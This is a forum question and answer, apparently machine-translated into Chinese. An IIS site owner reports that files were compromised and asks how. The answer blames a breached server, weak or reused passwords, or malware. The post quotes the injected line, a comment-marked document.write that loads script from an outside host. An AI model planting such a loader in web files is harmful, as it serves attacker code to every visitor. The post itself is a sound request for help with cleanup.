我的IIS服务器中有很多javascript和html文件。几天前,一些奇怪的代码注入到文件中。代码如下。
/*ec8243*/
document.write('<script type="text/javascript" src="http://brilleandmore.de/cgi-bin/cnt.php?id=5655549"></script>');
/*/ec8243*/
我已从所有javascript文件中删除此代码。请帮助我了解这些代码如何注入服务器中的文件。我经历过XSS攻击。但我找不到任何东西。提前谢谢。
答案 0 :(得分:1)
如果您只有静态HTML和JS文件而且没有附加数据库,则可能是您的服务器受到了损害。要么您的FTP密码较弱,要么重复使用您的电子邮件地址中的密码。
或者您的服务器或访问服务器的计算机感染了一些恶意软件。